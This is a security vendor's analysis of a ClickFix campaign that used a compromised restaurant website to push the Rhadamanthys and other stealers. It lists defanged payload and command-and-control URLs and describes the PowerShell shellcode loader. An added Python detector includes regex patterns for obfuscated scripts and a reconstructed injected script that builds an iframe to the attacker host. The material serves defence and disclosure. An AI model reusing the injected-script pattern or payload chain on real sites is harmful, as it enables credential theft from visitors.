Industry Insights
ClickFix Campaign Targets Restaurant Reservations
July 29, 2025 | 5 min read
Joshua Green and Thomas Elkins

BlueVoyant Threat Fusion Cell (TFC) researchers recently investigated a ClickFix attack with unique aspects. The attack began when a user at a UK-based organization navigated to a restaurant’s website to make a reservation; the user reportedly had used the site extensively in the past to arrange business meetings, which the logs corroborated.
The site compromised by this specific ClickFix campaign was gaia-restaurants[.]com. Upon visiting the initial site, a visitor is presented with a video and music, then guided to select various locations for the restaurant, including London, Marbella, Monte-Carlo, Doha, and Dubai. As of the time of our investigation, the lone compromised page appeared to be the London site, which served the below ClickFix landing page.

What are ClickFix Attacks?
Taking a step back, ClickFix is a social engineering tactic that uses a fake error or verification message to manipulate victims into copying and running a malicious script, according to ESET.
The tactic was first observed in early 2024, and has surged 517% in the past 6 months, according to ESET.
How Did This Restaurant ClickFix Attack Work?
Examining the URL gaia-restaurants[.]com/london/, BlueVoyant found it was compromised with a threat actor inserting a JavaScript script within script tags, which is an approach seen in similar campaigns. The script was disguised using a publicly available tool.

The injected script contained a list of IP addresses. If a user’s IP address does not match any on the list, the JavaScript creates an HTML iFrame element and dynamically loads content from the remote server at hxxps://cdncloud[.]icu/?ref=gaia-restaurants.com. Critically, the iFrame is embedded directly into the compromised gaia-restaurants[.]com/london/ page, ensuring the user’s address bar continues to display the legitimate gaia-restaurants[.]com domain.
The iFrame content is pulled from cdncloud[.]icu, which was hosted by Cloudflare; however, because it is embedded within the gaia-restaurants.com page, the browser’s address bar still shows the legitimate domain. This is standard iFrame behavior and central to the attack’s deception. This technique creates the illusion that the prompt originates from the legitimate site, masking the malicious payload’s external origin.
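The following is an added example written for this post, not BlueVoyant's own tooling. It audits a page's HTML for the two artifacts described above: an iframe whose host is not the page's own host (the way the cdncloud[.]icu frame sat inside gaia-restaurants[.]com/london/), and an inline script that packs its strings as hex or unicode escapes and then reaches a decoder or createElement. The sample DOM is constructed for the example, with the hosts taken from the write-up; a raw fetch of a compromised page would show only the script, so the iframe check assumes a rendered-DOM dump from a headless browser.

```python
"""Flag off-site iframes and packed inline scripts in a page's HTML (added example)."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Packed string literals: four or more consecutive \xNN / \uNNNN escapes.
ESCAPE_RUNS = re.compile(r"(?:\\x[0-9a-fA-F]{2}|\\u[0-9a-fA-F]{4}){4,}")
# Decoding, dynamic evaluation, or element creation from script.
DYNAMIC_EXEC = re.compile(
    r"\b(?:eval|atob|unescape|Function|createElement)\s*\(|fromCharCode"
)


class PageAuditor(HTMLParser):
    """Collect iframe src attributes and the bodies of inline <script> blocks."""

    def __init__(self):
        super().__init__()
        self._in_script = False
        self.iframes = []
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe" and a.get("src"):
            self.iframes.append(a["src"])
        elif tag == "script" and not a.get("src"):
            self._in_script = True
            self.scripts.append("")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts[-1] += data


def audit_page(page_url, html):
    """Return a list of (finding, detail) tuples for the given page HTML."""
    site_host = urlparse(page_url).hostname
    parser = PageAuditor()
    parser.feed(html)
    findings = []
    for src in parser.iframes:
        host = urlparse(src).hostname  # relative src values have no host and are skipped
        if host and host != site_host and not host.endswith("." + site_host):
            findings.append(("offsite_iframe", host))
    for body in parser.scripts:
        packed = ESCAPE_RUNS.search(body) is not None
        dynamic = sorted({m.group(0).split("(")[0].strip() for m in DYNAMIC_EXEC.finditer(body)})
        if packed and dynamic:  # both together, since either alone is common in benign code
            findings.append(("obfuscated_inline_script", ",".join(dynamic)))
    return findings


SITE_URL = "https://gaia-restaurants.com/london/"

# Constructed rendered-DOM sample: a packed script with an IP allowlist branch,
# plus the off-site iframe it created and one legitimate same-site iframe.
SAMPLE_DOM = """<html><body>
<script>var _0x1f=["\\x69\\x66\\x72\\x61\\x6d\\x65","\\x73\\x72\\x63"];
var allow=["203.0.113.7","198.51.100.9"];
if(allow.indexOf(visitorIp)<0){var f=document.createElement(_0x1f[0]);
f[_0x1f[1]]="https://cdncloud.icu/?ref="+location.hostname;document.body.appendChild(f);}</script>
<iframe src="https://cdncloud.icu/?ref=gaia-restaurants.com" style="border:0"></iframe>
<iframe src="/london/menu"></iframe>
</body></html>"""

BENIGN_DOM = "<html><body><script>document.title='Gaia';</script><iframe src='/london/menu'></iframe></body></html>"

if __name__ == "__main__":
    for finding in audit_page(SITE_URL, SAMPLE_DOM):
        print(*finding)
```

Because the injected script only builds the iframe for visitors outside its allowlist, a crawler run from a known scanner range may never see the frame; comparing a raw fetch against a rendered DOM from an unfamiliar egress address is the more reliable check.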

If the user passes all function checks, they are presented with the ClickFix prompt. Instead of just being told to click a box to verify you are human or select all images that contain motorcycles, for example, the user is asked to run a script. As seen in the image below, the user was prompted to open a Run dialog box (Win + R), paste (Ctrl + V), and execute an obfuscated PowerShell command.


Code analysis suggests the threat actors attempted to hide the server used to deliver payloads, and direct victims along various attack chain paths.
Using a Man-in-the-Middle (MiTM) proxy, BlueVoyant was able to capture the request and the response from that server, which led to the download of a PowerShell script in our analyzed sample.
Analysis of the PowerShell indicates the purpose of the script is to download a remote file named cptch.bin from the URL hxxp://94.154.35[.]115/user_profiles_photo/cptch.bin and save the file into the user’s AppData\Local directory, within a newly created subfolder named scache. As noted below, the URL of the cptch.bin file is stored in a variable named $shellcodeUrl.
The purpose of the rest of the script is to check if the file cptch.bin is present, then attempt to reflectively load and execute the shellcode using various WinAPI functions for process injection such as VirtualAlloc, VirtualProtect, CreateThread. These can be used to load malware.

Interestingly, while analyzing the PowerShell script hosted on the remote server, we also noted various lines containing commented code written in Cyrillic. The presence of the Cyrillic comments coupled with their formatting and simplicity suggests the operators behind these attacks are Russian-speaking and that AI was likely used to build the script. A few of the translated comments read as:
- # Parameters
- # markerPath folder
- # Check: if folder exists, the script exits.
- # Download shellcode as byte array.
- # Import WinAPI functions
The TFC identified the primary function of cptch.bin as decrypting the Rhadamanthys Stealer’s loader component, allocating executable memory via the Windows API functions and subsequently transferring execution to the decrypted loader within the newly allocated memory region.
The Rhadamanthys loader attempts to retrieve its stealer component from the URL hxxps://107.150.0[.]79/gate12837823way/5js75177.rvb2h. Upon successful download, the stealer is injected into a newly spawned process named wmpshare.exe. Once executed, the Rhadamanthys stealer initiates a connection back to the same IP address for command and control.
As part of the analysis, several other payload URLs hosted on the same 94.154.35[.]115 server were also discovered. These URLs followed a similar format and were also observed in late June and early July. The payloads turned out to lead to other commodity stealer malware payloads:
- http[:]//94.154.35[.]115/user_profiles_photo/update.exe: PureLogs Stealer
- http[:]//94.154.35[.]115/user_profiles_photo/stlc.exe: StealC Stealer
- http[:]//94.154.35[.]115/user_profiles_photo/shinsc.bin: Shellcode binary
- http[:]//94.154.35[.]115/user_profiles_photo/shellcode.bin: Shellcode binary
- http[:]//94.154.35[.]115/user_profiles_photo/klzpshell.exe: LummaC2 Stealer
Analysis of the Indicators of Compromise (IOC) revealed a wide campaign targeting visitors from dozens of compromised websites across diverse industries and geographies, including finance, retail, technology, and even government.
How BlueVoyant’s Research is Keeping Clients Safe
BlueVoyant TFC continues to monitor ClickFix attacks to ensure any new tactics are surfaced and clients are defended. Because of the detections BlueVoyant already has in place for ClickFix campaigns, the BlueVoyant SOC was able to immediately respond to the initial ClickFix payload.
In the above case, BlueVoyant immediately responded to the initial ClickFix alert when the first PowerShell command attempted to execute. Quick action by BlueVoyant SOC analysts working together with the client confirmed the attack was blocked, the user’s account was reset, and the infected device was cleaned.
The operators behind this attack chain opted to host their PowerShell-based loader directly on a Cloudflare server, serving it through iFrame content displayed on compromised sites. Further analysis of the PowerShell script suggests the code may have been generated using AI tools by Russian-speaking actors. This evidence confirms the oft-noted assessment that AI tools are being widely employed by adversaries as well. The evidence suggests this is a “traffer” operation centering on the goal of credential theft and information stealing, a significant threat that seems to be expanding exponentially with each passing day. If the “right” user goes to their favorite restaurant spot to reserve a table for a business meeting, then this story could have had a different, more nightmarish ending.
How to Protect Yourself from ClickFix Attacks
One of the biggest ways to prevent attacks like these is to be highly suspicious of unexpected prompts. If a website is asking you to run code instead of clicking a box, this is highly indicative of ClickFix, and you should not proceed further.
Organizations should also educate employees on the risks of ClickFix attacks and test them.
In addition, organizations should have a trusted cybersecurity partner to share threat intelligence and detection tactics to help prevent their employees from falling victim.
Joshua Green is a principal security researcher, and Thomas Elkins is a tier 3 SOC analyst.